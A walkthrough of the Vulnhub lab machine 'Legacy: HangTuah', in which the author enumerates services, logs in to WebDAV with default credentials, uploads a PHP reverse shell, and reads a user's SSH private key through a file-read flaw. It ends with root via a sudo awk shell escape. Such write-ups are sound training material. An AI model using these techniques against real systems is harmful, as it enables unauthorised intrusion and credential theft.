Legacy : HangTuah Vulnhub Walkthrough

Walkthrough

IP of the target : 192.168.1.132

As usual I started with nmap scan to find open ports and services using the command show below:

nmap -sC -sV -Pn -p- -T4 --max-rate=1000 -o nmap.txt 192.168.1.132

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
777/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)

FTP server allows anonymous login, so I logged in and found a hidden file.

┌─[m4g1c14n@parrot]─[~/Desktop/HTB/legacy]
└──╼ $ftp 192.168.1.132 777
Connected to 192.168.1.132.
220 (vsFTPd 3.0.3)
Name (192.168.1.132:m4g1c14n): anonymous
331 Please specify the password.
Password:
230 Login successful.
.
.
.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 33       33           4096 Aug 21 08:03 .
drwxr-xr-x    3 33       33           4096 Aug 21 08:03 ..
drwxr-xr-x    3 0        33           4096 Aug 24 14:32 .secret
226 Directory send OK.
ftp> cd .secret
250 Directory successfully changed.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 0        33           4096 Aug 24 14:32 .
drwxr-xr-x    3 33       33           4096 Aug 21 08:03 ..
drwxr-xr-x    2 0        33           4096 Aug 25 00:16 ...
-rw-r--r--    1 0        33             42 Aug 24 14:32 notes.txt

I transferred the notes.txt in my local system but after reading the file I didn't find any useful information, next I started the enumeration from port 80/HTTP and it was a normal Apache2 default page, Now I decided to run a directory brute-force attack.

┌─[m4g1c14n@parrot]─[~/Desktop/HTB/legacy]
└──╼ $wfuzz -c -z file,/usr/share/wordlists/dirb/big.txt --hc 404 -t 300 http://192.168.1.132/FUZZ
.
.
.
===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                              
===================================================================

000015551:   200        4 L      6 W      59 Ch       "robots.txt"

Only file I found was robots.txt, so let's see what we have inside this .

User-agent: *
 Allow: / 
Sitemap: http://legacyhangtuah.com

The robots.txt file revealed that domain name is legacyhangtuah.com, so we need to edit the /etc/hosts file.

192.168.1.132   legacyhangtuah.com
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Now I started to browse this domain and found a completely new website.

legacyhangtuah.com

I started a directory brute-force attack on this domain using the command shown below.

└──╼ $wfuzz -c -z file,/usr/share/wordlists/dirb/big.txt --hc 404 -t 300 http://legacyhangtuah.com/FUZZ
.
.
.
===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                              
===================================================================

000000015:   403        9 L      28 W     283 Ch      ".htaccess"                                                                     
000000016:   403        9 L      28 W     283 Ch      ".htpasswd"                                                                          
000002716:   301        9 L      28 W     325 Ch      "assets"                                                                             
000005517:   301        9 L      28 W     322 Ch      "css"                                                                                
000010190:   301        9 L      28 W     321 Ch      "js"                                                                                 
000011356:   301        9 L      28 W     325 Ch      "manual"                                                                             
000016215:   403        9 L      28 W     283 Ch      "server-status" 

First of all I checked the manual file and found something interesting

I thought that this is the way to gain an initial shell, maybe designmodo has some publicly available exploit but I was wrong. Now after this, I thought to enumerate subdomains using the command.

└──╼ $wfuzz -H 'HOST: FUZZ.legacyhangtuah.com' -u 'http://192.168.1.132' -w ../subdomains-top1million-5000.txt --sc 200
.
.
.
===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                              
===================================================================

000000001:   200        373 L    968 W    11319 Ch    "www"                                                                                
000000002:   200        373 L    968 W    11319 Ch    "mail"                                                                               
000000003:   200        373 L    968 W    11319 Ch    "ftp"                                                                                
000000004:   200        373 L    968 W    11319 Ch    "localhost"                                                                          
000000005:   200        373 L    968 W    11319 Ch    "webmail"                                                                            
000000006:   200        373 L    968 W    11319 Ch    "smtp"                                                                               
000000007:   200        373 L    968 W    11319 Ch    "webdisk"                                                                            
000000008:   200        373 L    968 W    11319 Ch    "pop"                                                                                
000000009:   200        373 L    968 W    11319 Ch    "cpanel"                                                                             
000000010:   200        373 L    968 W    11319 Ch    "whm"                                                                                
000000011:   200        373 L    968 W    11319 Ch    "ns1"                                                                                
000000012:   200        373 L    968 W    11319 Ch    "ns2"              

Every subdomain was showing the response code 200 so to find the correct subdomain I decided to hide words instead of code, means instead of using --hc flag I will use --hw flag now.

└──╼ $wfuzz -H 'HOST: FUZZ.legacyhangtuah.com' -u 'http://192.168.1.132' -w ../subdomains-top1million-5000.txt --hw 968
.
.
.
===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                              
===================================================================

000003496:   200        57 L     194 W    2062 Ch     "door"        

This means that door.legacyhangtuah.com is a subdomain and to access this we need to edit the /etc/hosts file .

192.168.1.132   legacyhangtuah.com door.legacyhangtuah.com
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback

Now it is the time for enumerating the subdomain.

I decided to run a directory brute-force attack against this subdomain and found a very interesting directory .

└──╼ $wfuzz -c -z file,/usr/share/wordlists/dirb/big.txt --hc 404 -t 250 http://door.legacyhangtuah.com/FUZZ

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://door.legacyhangtuah.com/FUZZ
Total requests: 20469

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                              
===================================================================

000000015:   403        9 L      28 W     288 Ch      ".htaccess"                                                                          
000000016:   403        9 L      28 W     288 Ch      ".htpasswd"                                                                          
000000965:   200        115 L    998 W    6554 Ch     "LICENSE"                                                                            
000009378:   301        9 L      28 W     335 Ch      "images"                                                                             
000016215:   403        9 L      28 W     288 Ch      "server-status"                                                                      
000019561:   401        14 L     54 W     470 Ch      "webdav"     

I tried to access the webdav directory but it was protected using http-basic-auth and after trying some common credentials I succeeded with admin:admin. found a file passwd.dav with a username and a hash , cracking the hash resulted in same password that is admin . It was a like dead end then I started to search about webdav and found that PUT method can be exploited using different ways and I found a new tool cadaver, this means that we can download and upload any file in webdav directory, so I simply uploaded a php reverse shell using the commands shown below.

└──╼ $cadaver http://door.legacyhangtuah.com/webdav
Authentication required for webdav on server `door.legacyhangtuah.com':
Username: admin
Password: 
dav:/webdav/> put shell.php 
Uploading shell.php to `/webdav/shell.php':
Progress: [=============================>] 100.0% of 5495 bytes succeeded.
dav:/webdav/>

Now I started a listener and after accessing the following url and got a reverse shell:

http://door.legacyhangtuah.com/webdav/shell.php

Now it's time for some privesc. While traversing through different directories I found something interesting in /var/www.

www-data@legacyhangtuah:/$ cd /var/www
cd /var/www
www-data@legacyhangtuah:/var/www$ ls -al
ls -al
total 40
drwxr-xr-x  8 www-data www-data 4096 Aug 24 13:43 .
drwxr-xr-x 14 root     root     4096 Aug 21 07:43 ..
-rw-------  1 www-data www-data 6378 Aug 25 00:18 .bash_history
drwx------  2 www-data www-data 4096 Aug 24 13:34 .gnupg
drwxrwxrwx  3 www-data www-data 4096 Aug 24 13:43 .local
.
.
.

Reading .bash_history revealed some good content, important things that I noticed in .bash_history.

cat send_letter.txt
cd /opt/pendekar/
echo '/etc/passwd' > official_letter.txt

Then I changed the directory to /opt/pendekar and there I found this official_letter.txt and inside the home directory of pendekar, I found send_letter.txt file and also a bash script that user www-data can't read.

I also found that send_letter.txt and official_letter.txt are connected with each other, so my next step was to write the content of official_letter.txt as /etc/passwd and after that I will read the send_letter.txt, and boom I got the /etc/passwd file in send_letter.txt.

www-data@legacyhangtuah:/opt/pendekar$ cat official_letter.txt
cat official_letter.txt
/etc/passwd
www-data@legacyhangtuah:/opt/pendekar$ cat /home/pendekar/send_letter.txt
cat /home/pendekar/send_letter.txt
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
.
.
.
.

In the same way I got the private keys of user pendekar.

www-data@legacyhangtuah:/opt/pendekar$ cat official_letter.txt
cat official_letter.txt
/home/pendekar/.ssh/id_rsa
www-data@legacyhangtuah:/opt/pendekar$ cat /home/pendekar/send_letter.txt
cat /home/pendekar/send_letter.txt
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEA6ZbX4WEi76oUlepHbgL5OXK3kkZ3Siv6Vh+dRcP8W4Hc3vGzv/a3
KgmJ9s1sH80g/J3gt4XAopTttZxxjCcC7HlLVD17WStPffqJD5I12CPQ/+Cwz61JhqPMu0
ulPSPmlC5PCuBptC3qB3vnFXmqP9iAWYT06p1MwI07lPHIxCHdJwlkn4mgGwxPSuvRoDur
.
.
.
.

Now I copied the private key in my local system and by setting up the correct permission I was inside the system as user pendekar.

└──╼ $ssh -i pen pendekar@192.168.1.132
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-42-generic x86_64)
.
.
.
.
pendekar@legacyhangtuah:~$ id
uid=1001(pendekar) gid=1001(pendekar) groups=1001(pendekar)

I found a file inside the home directory of user hangtuah.

pendekar@legacyhangtuah:~$ cd /home/hangtuah/
pendekar@legacyhangtuah:/home/hangtuah$ ls
lastnotes.txt
pendekar@legacyhangtuah:/home/hangtuah$ cat lastnotes.txt 
I have been waiting for you pendekar.. I do not have enough time.
Many people looking for me there is no more hope for me in here.
I know you are the best one to secure this palace instead of me. 
I need to go now somewhere very far and I hope we will meet soon...

..
--. .. ...- .
-.-- --- ..-
.--. . .-. -- .. ... ... .. --- -.
.- .-.. .-. . .- -.. -.-- .-.-.- .-.-.- .-.-.-
- .... .
.-..-. -.- . -.-- .-..-. .-.-.- .-.-.- .-.-.-
-.-- --- ..-
-.- -. --- .--
.-- .... .- -
..
-- . .- -.
-... . -.-. .- ..- ... .
-.-- --- ..-
.- .-. .
.--. . -. -.. . -.- .- .-. -.-.--

-....-
.... .- -. --. - ..- .- ....

This looks like a morse code, lets convert the morse code to text.

website used :- https://www.boxentriq.com/code-breaking/morse-code

This is a hint to gain access to hangtuah's shell, so in the earlier steps. I have saved the pendekar's id_rsa in my local system so this time also I decided to use the same private key to gain access to hangtuah's shell and yes this worked!

└──╼ $ssh -i pen hangtuah@192.168.1.132
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-42-generic x86_64)
.
.
.
.
hangtuah@legacyhangtuah:~$ id
uid=1002(hangtuah) gid=1002(hangtuah) groups=1002(hangtuah)
hangtuah@legacyhangtuah:~$ 

Next, I checked for user privileges and found that user hangtuah can run /usr/bin/awk as user root also, So using the trick I found on GTFOBins, I got the root shell.

sudo -u root /usr/bin/awk 'BEGIN {system("/bin/sh")}'

and this completed the challenge , I hope you like the walkthrough :)

NOTE: The awesome artwork used in this article was created by Evgeny Polukhin.